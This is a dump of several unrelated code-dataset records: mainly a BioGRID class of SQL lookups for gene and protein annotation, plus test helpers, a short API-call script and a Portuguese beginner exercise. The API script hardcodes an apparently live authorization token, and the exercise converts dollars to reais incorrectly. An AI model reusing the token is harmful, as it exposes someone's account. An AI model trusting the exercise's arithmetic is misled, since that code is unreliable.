row\r\n\t\t\t\r\n\t\treturn organismHash\t\r\n\t\r\n\tdef fetchGODefinitionHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT go_id, go_name, go_type FROM \" + Config.DB_NAME + \".go_definitions\" )\r\n\t\t\r\n\t\tgoHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgoHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn goHash\r\n\t\t\r\n\tdef fetchGOEvidenceHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT go_evidence_code_id, go_evidence_code_symbol FROM \" + Config.DB_NAME + \".go_evidence_codes\" )\r\n\t\t\r\n\t\tgoHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgoHash[str(row[0])] = row[1]\r\n\t\t\t\r\n\t\treturn goHash\r\n\t\t\r\n\tdef formatGOSet( self, goSet, goCombined ) :\r\n\t\r\n\t\tif len(goSet[\"IDS\"]) > 0 :\r\n\t\t\tgoCombined[\"IDS\"] = goCombined[\"IDS\"] + goSet[\"IDS\"]\r\n\t\t\tgoCombined[\"NAMES\"] = goCombined[\"NAMES\"] + goSet[\"NAMES\"]\r\n\t\t\tgoCombined[\"EVIDENCE\"] = goCombined[\"EVIDENCE\"] + goSet[\"EVIDENCE\"]\r\n\t\t\t\r\n\t\t\tgoSet[\"IDS\"] = \"|\".join( goSet[\"IDS\"] )\r\n\t\t\tgoSet[\"NAMES\"] = \"|\".join( goSet[\"NAMES\"] )\r\n\t\t\tgoSet[\"EVIDENCE\"] = \"|\".join( goSet[\"EVIDENCE\"] )\r\n\t\t\t\r\n\t\telse :\r\n\t\t\t\r\n\t\t\tgoSet[\"IDS\"] = \"-\"\r\n\t\t\tgoSet[\"NAMES\"] = \"-\"\r\n\t\t\tgoSet[\"EVIDENCE\"] = \"-\"\r\n\t\t\t\r\n\t\treturn goSet, goCombined\r\n\t\t\r\n\tdef fetchGO( self, itemID, itemType ) :\r\n\t\r\n\t\tgoProcess = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\tgoComponent = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\tgoFunction = { \"IDS\" : [], \"NAMES\" : [], \"EVIDENCE\" : [] }\r\n\t\t\r\n\t\tif len(itemID) > 0 :\r\n\t\t\t\r\n\t\t\tif \"GENE\" == itemType.upper( ) :\r\n\t\t\t\tself.cursor.execute( \"SELECT go_id, go_evidence_code_id FROM \" + Config.DB_NAME + \".gene_go WHERE gene_id=%s AND gene_go_status='active'\", [itemID] )\r\n\t\t\telif \"UNIPROT\" == itemType.upper( ) :\r\n\t\t\t\tself.cursor.execute( \"SELECT go_id, go_evidence_code_id FROM \" + Config.DB_NAME + \".uniprot_go WHERE uniprot_id=%s AND uniprot_go_status='active'\", [itemID] )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t(goID, goName, goType) = self.goDefs[str(row[0])]\r\n\t\t\t\tgoEvidence = self.goEvidence[str(row[1])]\r\n\t\t\t\t\r\n\t\t\t\tgoCompare = goName.upper( )\r\n\t\t\t\tif \"BIOLOGICAL_PROCESS\" != goCompare and \"CELLULAR_COMPONENT\" != goCompare and \"MOLECULAR_FUNCTION\" != goCompare :\r\n\t\t\t\t\t\r\n\t\t\t\t\tgoCompare = goType.upper( )\r\n\t\t\t\t\tif \"BIOLOGICAL_PROCESS\" == goCompare :\r\n\t\t\t\t\t\tgoProcess[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoProcess[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoProcess[\"NAMES\"].append( goName )\r\n\t\t\t\t\t\r\n\t\t\t\t\telif \"CELLULAR_COMPONENT\" == goCompare :\r\n\t\t\t\t\t\tgoComponent[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoComponent[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoComponent[\"NAMES\"].append( goName )\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telif \"MOLECULAR_FUNCTION\" == goCompare :\r\n\t\t\t\t\t\tgoFunction[\"IDS\"].append( str(goID) )\r\n\t\t\t\t\t\tgoFunction[\"EVIDENCE\"].append( goEvidence )\r\n\t\t\t\t\t\tgoFunction[\"NAMES\"].append( goName )\t\r\n\t\t\r\n\t\treturn goProcess, goComponent, goFunction\r\n\t\t\r\n\tdef fetchExternalsForRefseq( self, refseqIDs ) :\r\n\t\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT refseq_accession, refseq_gi, refseq_version FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id IN (%s) and refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternalIDSet.extend( [str(row[0]), str(row[1])] )\r\n\t\t\t\texternalTypeSet.extend( [\"REFSEQ-PROTEIN-ACCESSION\", \"REFSEQ-PROTEIN-GI\"] )\r\n\t\t\t\t\r\n\t\t\t\tfor version in range( 0, row[2] ) :\r\n\t\t\t\t\texternalIDSet.append( str(row[0]) + \".\" + str(version+1) )\r\n\t\t\t\t\texternalTypeSet.append( \"REFSEQ-PROTEIN-ACCESSION-VERSIONED\" )\r\n\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT refseq_identifier_value, refseq_identifier_type FROM \" + Config.DB_NAME + \".refseq_identifiers WHERE refseq_id IN (%s) and refseq_identifier_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternalIDSet.append( str(row[0]) )\r\n\t\t\t\t\r\n\t\t\t\trefseqType = \"REFSEQ\"\r\n\t\t\t\tif \"rna-accession\" == row[1].lower( ) :\r\n\t\t\t\t\trefseqType = \"REFSEQ-RNA-ACCESSION\"\t\r\n\t\t\t\telif \"rna-gi\" == row[1].lower( ) :\r\n\t\t\t\t\trefseqType = \"REFSEQ-RNA-GI\"\r\n\t\t\t\t\t\r\n\t\t\t\texternalTypeSet.append( refseqType )\r\n\t\t\t\t\r\n\t\treturn externalIDSet, externalTypeSet\r\n\t\t\r\n\tdef fetchExternals( self, geneID, refseqIDs ) :\r\n\t\r\n\t\texternals = set( )\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT gene_external_value, gene_external_source FROM \" + Config.DB_NAME + \".gene_externals WHERE gene_external_status='active' AND gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\texternals.add( str(row[0]).upper( ) + \"|\" + str(row[1]).upper( ) )\r\n\t\t\t\t\r\n\t\t\trefseqExternals, refseqExternalTypes = self.fetchExternalsForRefseq( refseqIDs )\r\n\t\t\t\r\n\t\t\tif len(refseqExternals) > 0 :\r\n\t\t\t\tfor refseqExternal, refseqExternalType in zip( refseqExternals, refseqExternalTypes ) :\r\n\t\t\t\t\texternals.add( str(refseqExternal).upper( ) + \"|\" + str(refseqExternalType).upper( ) )\r\n\t\r\n\t\tfor external in externals :\r\n\t\t\textSplit = external.split( \"|\" )\r\n\t\t\texternalIDSet.append( extSplit[0] )\r\n\t\t\texternalTypeSet.append( extSplit[1] )\r\n\t\r\n\t\treturn externalIDSet, externalTypeSet\r\n\t\t\r\n\tdef fetchAliases( self, geneID, officialSymbol ) :\r\n\t\r\n\t\taliases = []\r\n\t\tuniqueAliases = set( )\r\n\t\tsystematicName = \"-\"\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT gene_alias_value, gene_alias_type FROM \" + Config.DB_NAME + \".gene_aliases WHERE gene_alias_status='active' and gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif \"ordered locus\" == row[1] :\r\n\t\t\t\t\tsystematicName = str(row[0])\r\n\t\t\t\telse :\r\n\t\t\t\t\tif str(row[0].upper( )) != str(officialSymbol.upper( )) and str(row[0].upper( )) not in uniqueAliases :\r\n\t\t\t\t\t\taliases.append( str(row[0]) )\r\n\t\t\t\t\t\tuniqueAliases.add( str(row[0].upper( )) )\r\n\t\t\t\t\t\t\r\n\t\treturn systematicName, aliases\r\n\t\t\r\n\tdef fetchRefseqIDs( self, geneID ) :\r\n\t\t\r\n\t\trefseqIDs = set( )\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE gene_id=%s and gene_refseq_status='active'\", [geneID] )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\trefseqIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn refseqIDs\r\n\t\t\r\n\tdef fetchUniprotIDs( self, refseqIDs ) :\r\n\t\r\n\t\tuniprotIDs = set( )\r\n\t\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_id FROM \" + Config.DB_NAME + \".protein_mapping WHERE refseq_id IN (%s) and protein_mapping_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tuniprotIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn uniprotIDs\r\n\t\t\r\n\tdef fetchUniprotNamesForGenes( self, uniprotIDs ) :\r\n\r\n\t\tuniprotAliases = set( )\r\n\t\tuniprotAliasesUnique = set( )\r\n\t\tuniprotExternals = set( )\r\n\t\tuniprotExternalsUnique = set( )\r\n\t\tuniprotExt = []\r\n\t\tuniprotExtTypes = []\r\n\t\t\r\n\t\tif len(uniprotIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(uniprotIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_identifier_value, uniprot_name, uniprot_source FROM \" + Config.DB_NAME + \".uniprot WHERE uniprot_id IN (%s) AND uniprot_status='active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\r\n\t\t\t\tif str(row[1]).upper( ) not in uniprotAliasesUnique :\r\n\t\t\t\t\tuniprotAliases.add( row[1] )\r\n\t\t\t\t\tuniprotAliasesUnique.add( row[1].upper( ) )\r\n\t\t\t\t\r\n\t\t\t\tif str(row[0]).upper( ) + \"|\" + str(row[2]).upper( ) not in uniprotExternalsUnique :\r\n\t\t\t\t\tuniprotExternals.add( str(row[0]) + \"|\" + str(row[2]).upper( ) )\r\n\t\t\t\t\tuniprotExternalsUnique.add( str(row[0]).upper( ) + \"|\" + str(row[2]).upper( ) )\r\n\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_alias_value, uniprot_alias_type FROM \" + Config.DB_NAME + \".uniprot_aliases WHERE uniprot_id IN (%s) AND uniprot_alias_type != 'primary-accession' AND uniprot_alias_status='active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif 'ACCESSION' == row[1].upper( ) :\r\n\t\t\t\t\tif str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" not in uniprotExternalsUnique :\r\n\t\t\t\t\t\tuniprotExternals.add( str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" )\r\n\t\t\t\t\t\tuniprotExternalsUnique.add( str(row[0]).upper( ) + \"|UNIPROT-ACCESSION\" )\r\n\t\t\t\telse :\r\n\t\t\t\t\tif str(row[0]).upper( ) not in uniprotAliasesUnique :\r\n\t\t\t\t\t\tuniprotAliases.add( row[0] )\r\n\t\t\t\t\t\tuniprotAliasesUnique.add( row[0].upper( ) )\r\n\t\t\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_isoform_accession, uniprot_isoform_number FROM \" + Config.DB_NAME + \".uniprot_isoforms WHERE uniprot_id IN (%s) AND uniprot_isoform_status = 'active'\" % sqlFormat, tuple(uniprotIDs) )\r\n\t\t\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t\r\n\t\t\t\tisoform = row[0].upper( ) + \"-\" + str(row[1]) + \"|UNIPROT-ISOFORM\"\r\n\t\t\t\t\r\n\t\t\t\tif isoform not in uniprotExternalsUnique :\r\n\t\t\t\t\tuniprotExternals.add( isoform )\r\n\t\t\t\t\tuniprotAliasesUnique.add( isoform )\r\n\t\t\t\t\t\r\n\t\t\tfor uniprotExtInfo in uniprotExternals :\r\n\t\t\t\textSplit = uniprotExtInfo.split( \"|\" )\r\n\t\t\t\tuniprotExt.append(extSplit[0])\r\n\t\t\t\tuniprotExtTypes.append(extSplit[1])\r\n\t\t\t\t\t\r\n\t\treturn list(uniprotAliases), uniprotExt, uniprotExtTypes\r\n\t\t\r\n\tdef fetchDescription( self, geneID, refseqIDs ) :\r\n\t\t\r\n\t\tif len(geneID) > 0 :\r\n\t\t\r\n\t\t\tdescriptions = { }\r\n\t\t\t\r\n\t\t\tself.cursor.execute( \"SELECT gene_definition_text, gene_definition_source FROM \" + Config.DB_NAME + \".gene_definitions WHERE gene_definition_status='active' AND gene_id=%s\", [geneID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif row[1] not in descriptions :\r\n\t\t\t\t\tdescriptions[row[1]] = set( )\r\n\t\t\t\tdescriptions[row[1]].add( row[0] )\r\n\t\t\t\t\r\n\t\t\tif 'CGD-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['CGD-DESCRIPTION'])\r\n\t\t\t\r\n\t\t\tif 'SGD-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['SGD-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'POMBASE-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['POMBASE-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'WORMBASE-DESCRIPTION' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['WORMBASE-DESCRIPTION'])\r\n\t\t\t\t\r\n\t\t\tif 'WORMBASE-CLASS' in descriptions :\r\n\t\t\t\treturn \"; \".join(descriptions['WORMBASE-CLASS'])\r\n\t\t\t\t\r\n\t\t\tif len(refseqIDs) > 0 :\r\n\t\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\t\tself.cursor.execute( \"SELECT refseq_description FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id IN (%s) and refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\r\n\t\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\t\tif 'PROTEIN-DESCRIPTION' not in descriptions :\r\n\t\t\t\t\t\tdescriptions['PROTEIN-DESCRIPTION'] = set( )\r\n\t\t\t\t\tdescriptions['PROTEIN-DESCRIPTION'].add( row[0] )\r\n\t\t\t\t\r\n\t\t\tdescription = \"-\"\r\n\t\t\tif 'ENTREZ-DESCRIPTION' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-DESCRIPTION'])\r\n\t\t\t\t\t\t\r\n\t\t\telif 'PROTEIN-DESCRIPTION' in descriptions :\r\n\t\t\t\t\r\n\t\t\t\tlongestDesc = \"-\"\r\n\t\t\t\tfor description in descriptions['PROTEIN-DESCRIPTION'] :\r\n\t\t\t\t\tif len(longestDesc) <= len(description) :\r\n\t\t\t\t\t\tlongestDesc = description\r\n\t\t\t\t\t\t\r\n\t\t\t\tdescription = longestDesc\r\n\t\t\t\t\r\n\t\t\telif 'ENTREZ-OTHERDESIGNATION' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-OTHERDESIGNATION'])\r\n\t\t\t\t\t\t\r\n\t\t\telif 'ENTREZ-NOMENNAME' in descriptions :\r\n\t\t\t\tdescription = \"; \".join(descriptions['ENTREZ-NOMENNAME'])\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\treturn description\r\n\t\t\r\n\tdef fetchProtein( self, proteinRefID, proteinType ) :\r\n\t\r\n\t\tproteinDetails = []\r\n\t\tif len(proteinRefID) > 0 :\r\n\t\t\t\r\n\t\t\tif \"UNIPROT\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchUniprotProtein( proteinRefID )\r\n\t\t\telif \"REFSEQ\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchRefseqProtein( proteinRefID )\r\n\t\t\telif \"UNIPROT-ISOFORM\" == proteinType.upper( ) :\r\n\t\t\t\tproteinDetails = self.fetchUniprotIsoformProtein( proteinRefID )\r\n\t\t\telse :\r\n\t\t\t\tproteinDetails = False\r\n\t\t\t\r\n\t\treturn proteinDetails\r\n\t\t\t\r\n\tdef fetchUniprotProtein( self, uniprotID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".uniprot WHERE uniprot_id=%s and uniprot_status='active' LIMIT 1\", [uniprotID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchRefseqProtein( self, refseqID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".refseq WHERE refseq_id=%s and refseq_status='active' LIMIT 1\", [refseqID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchUniprotIsoformProtein( self, uniprotIsoformID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_NAME + \".uniprot_isoforms WHERE uniprot_isoform_id=%s and uniprot_isoform_status='active' LIMIT 1\", [uniprotIsoformID] )\r\n\t\t\r\n\t\trow = self.cursor.fetchone( )\r\n\t\treturn row\r\n\t\t\r\n\tdef fetchUniprotExternals( self, uniprotID, refseqIDs ) :\r\n\t\r\n\t\texternals = set( )\r\n\t\tentrezGeneIDs = set( )\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_external_value, uniprot_external_source FROM \" + Config.DB_NAME + \".uniprot_externals WHERE uniprot_id=%s AND uniprot_external_status='active'\", [uniprotID] )\r\n\t\t\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\r\n\t\t\tvalue = str(row[0]).upper( ).replace( \"HGNC:\", \"\" ).replace( \"MGI:\", \"\" ).replace( \"RGD:\", \"\" )\r\n\t\t\r\n\t\t\texternals.add( str(value) + \"|\" + str(row[1]) )\r\n\t\t\t\r\n\t\t\tif \"ENTREZ_GENE\" == row[1].upper( ) :\r\n\t\t\t\tentrezGeneIDs.add( str(row[0]) )\r\n\t\t\t\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\trefseqExternals, refseqExternalTypes = self.fetchExternalsForRefseq( refseqIDs )\r\n\t\t\t\t\r\n\t\t\tfor refseqExternal, refseqExternalType in zip(refseqExternals,refseqExternalTypes) :\r\n\t\t\t\texternals.add( str(refseqExternal) + \"|\" + str(refseqExternalType) )\r\n\t\t\t\t\r\n\t\texternalIDSet = []\r\n\t\texternalTypeSet = []\r\n\t\t\r\n\t\tfor external in externals :\r\n\t\t\tsplitExternal = external.split( \"|\" )\r\n\t\t\texternalIDSet.append( splitExternal[0] )\r\n\t\t\texternalTypeSet.append( splitExternal[1] )\r\n\t\t\t\t\r\n\t\treturn externalIDSet, externalTypeSet, entrezGeneIDs\r\n\t\t\r\n\tdef fetchRefseqIDsByUniprotID( self, uniprotID ) :\r\n\t\r\n\t\trefseqIDs = set( )\r\n\t\tif len(uniprotID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_NAME + \".protein_mapping WHERE uniprot_id=%s AND protein_mapping_status='active'\", [uniprotID] )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\trefseqIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn refseqIDs\r\n\t\t\r\n\tdef fetchGeneIDsByEntrezGeneIDs( self, entrezGeneIDs ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(entrezGeneIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(entrezGeneIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".genes WHERE gene_source_id IN (%s) AND gene_source='ENTREZ' AND gene_status='active'\" % sqlFormat, tuple(entrezGeneIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tgeneIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn geneIDs\r\n\t\t\r\n\tdef fetchGeneIDByRefseqIDs( self, refseqIDs ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(refseqIDs) > 0 :\r\n\t\t\tsqlFormat = \",\".join( ['%s'] * len(refseqIDs) )\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE refseq_id IN (%s) AND gene_refseq_status='active'\" % sqlFormat, tuple(refseqIDs) )\r\n\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tgeneIDs.add( str(row[0]) )\r\n\t\t\t\t\r\n\t\treturn geneIDs\r\n\t\t\r\n\tdef fetchGeneIDByRefseqID( self, refseqID ) :\r\n\t\r\n\t\tgeneIDs = set( )\r\n\t\tif len(refseqID) > 0 :\r\n\t\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_NAME + \".gene_refseqs WHERE refseq_id = %s AND gene_refseq_status='active' LIMIT 1\", [refseqID] )\r\n\t\t\trow = self.cursor.fetchone( )\r\n\t\t\t\r\n\t\t\tif None == row :\r\n\t\t\t\treturn \"0\"\r\n\t\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef hasFeatures( self, uniprotID ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_feature_id FROM \" + Config.DB_NAME + \".uniprot_features WHERE uniprot_id=%s AND uniprot_feature_status='active' LIMIT 1\", [uniprotID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn True\r\n\t\t\r\n\tdef fetchUniprotAliases( self, uniprotID, geneIDs, primaryIdentifier ) :\r\n\t\r\n\t\taliases = []\r\n\t\t\r\n\t\tif len(uniprotID) > 0 :\r\n\t\t\r\n\t\t\tself.cursor.execute( \"SELECT uniprot_alias_value FROM \" + Config.DB_NAME + \".uniprot_aliases WHERE uniprot_id=%s AND uniprot_alias_status='active'\", [uniprotID] )\r\n\t\t\t\t\t\t\r\n\t\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\t\tif row[0].upper( ) != primaryIdentifier.upper( ) :\r\n\t\t\t\t\taliases.append( str(row[0]) )\r\n\t\t\t\t\t\r\n\t\tif len(geneIDs) > 0 :\r\n\t\t\tfor geneID in geneIDs :\r\n\t\t\t\tsystematicName, geneAliases = self.fetchAliases( geneID, primaryIdentifier )\r\n\t\t\t\t\r\n\t\t\t\tif \"-\" != systematicName :\r\n\t\t\t\t\taliases.append( systematicName )\r\n\t\t\t\t\r\n\t\t\t\tif len(geneAliases) > 0 :\r\n\t\t\t\t\taliases.extend( geneAliases )\r\n\t\t\t\t\t\t\r\n\t\treturn set( aliases )\r\n\t\t\r\n\tdef fetchOfficialSymbol( self, geneID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT gene_name FROM \" + Config.DB_NAME + \".genes WHERE gene_id=%s LIMIT 1\", [geneID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn \"-\"\r\n\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef fetchCurationStatus( self, geneID, refseqID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT refseq_status FROM \" + Config.DB_NAME + \".gene_refseqs WHERE gene_id=%s AND refseq_id=%s LIMIT 1\", [geneID, refseqID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn \"-\"\r\n\t\t\t\r\n\t\treturn row[0]\r\n\t\t\r\n\tdef fetchValidGeneIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT gene_id FROM \" + Config.DB_QUICK + \".quick_annotation\" )\r\n\t\t\r\n\t\tgeneHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tgeneHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn geneHash\r\n\t\t\r\n\tdef fetchValidUniprotIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT uniprot_id FROM \" + Config.DB_QUICK + \".quick_uniprot\" )\r\n\t\t\r\n\t\tproteinHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tproteinHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn proteinHash\r\n\t\t\r\n\tdef fetchValidRefseqIDHash( self ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT refseq_id FROM \" + Config.DB_QUICK + \".quick_refseq\" )\r\n\t\t\r\n\t\tproteinHash = set( )\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\tproteinHash.add( str(row[0]) )\r\n\t\t\t\r\n\t\treturn proteinHash\r\n\t\t\r\n\tdef fetchQuickAnnotation( self, geneID ) :\r\n\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_annotation WHERE gene_id=%s\", [geneID] )\r\n\t\trow = self.cursor.fetchone( )\r\n\t\t\r\n\t\tif None == row :\r\n\t\t\treturn False\r\n\t\t\t\r\n\t\treturn row","repo_name":"BioGRID/BioGRID-Annotation","sub_path":"classes/Quick.py","file_name":"Quick.py","file_ext":"py","file_size_in_byte":19028,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"639634063","text":"import pandas as pd\nimport numpy as np\nfrom tdx import Formula\n\ndef verify_result(result, expected, float_cmp, debug):\n if not isinstance(result, pd.core.series.Series):\n if result == expected:\n print('TEST OK')\n return\n else:\n print('TEST Failed.')\n return\n result = result.dropna()\n expected = expected.dropna()\n if debug:\n print('RESULT:')\n print(result)\n print('EXPECTED:')\n print(expected)\n if float_cmp:\n cmp = (np.abs(result - expected) < 2.631048e-06)\n else:\n cmp = (result == expected)\n if len(cmp[cmp == False]) > 0 :\n print('TEST Failed.')\n return\n print('TEST OK.')\n return\n\n\ndef testfunc(text, param, float_comp = False, debug = False):\n formula = Formula(text, \"\")\n if isinstance(param, dict):\n params = [param]\n elif isinstance(param, list):\n params = param\n else:\n raise ValueError(\"param should be dict or list.\")\n\n for pa in params:\n #print(formula.annotate(pa))\n result = formula.evaluate(pa)\n if result is None:\n print('TEST Failed in evaluate strategy.')\n return\n verify_result(result, pa['RESULT'], float_comp, debug)\n\n\ndef testcase(func):\n def test_case_impl():\n print('Perform %s...' % func.__name__)\n ret = func()\n testfunc(*ret)\n return test_case_impl\n","repo_name":"woodylee1974/tdx_formula","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"18710454021","text":"import requests\nimport json\n\ntoken = '1'\n\nsrc = 'http://backend.lianalaser.com/Admin/'\n\nr = requests.get(src + 'operator/program/list/1402/2/2', headers={'Authorization': 'barear 4804fa170acc47078f14afc1cf7d4384'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/Admin/OperatorProgramList.py","file_name":"OperatorProgramList.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34076850540","text":"# Josefson deseja fazer compras na China. Ela quer comprar um celular de USD 299,99, uma chaleira de\r\n# USD 23,87, um gnomo de jardim de USD 66,66 e 6 adesivos de unicórnio de USD 1,42 cada um. O frete\r\n# de tudo isso para a cidade de Rolândia, no Paraná, ficou em USD 12,34.\r\n\r\ncelular = 299.99\r\nchaleira = 23.87\r\ngnomo = 66.66\r\nadesivos = 6 * 1.42\r\n\r\ntotalDolar = celular + chaleira + gnomo + adesivos\r\niof = 0.0638\r\ntotalReal = (totalDolar / 5.40)\r\n\r\nprint(\"A) \", totalDolar)\r\nprint(\"B) \", totalReal - (totalReal * iof))\r\nprint(\"C) \", totalReal * iof)\r\n\r\n","repo_name":"sadrack404/exercicios-python","sub_path":"ex.6.1/ex6.3.py","file_name":"ex6.3.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21481471436","text":"from django.conf.urls import url\nfrom . import views\n \nurlpatterns = [\n # url( 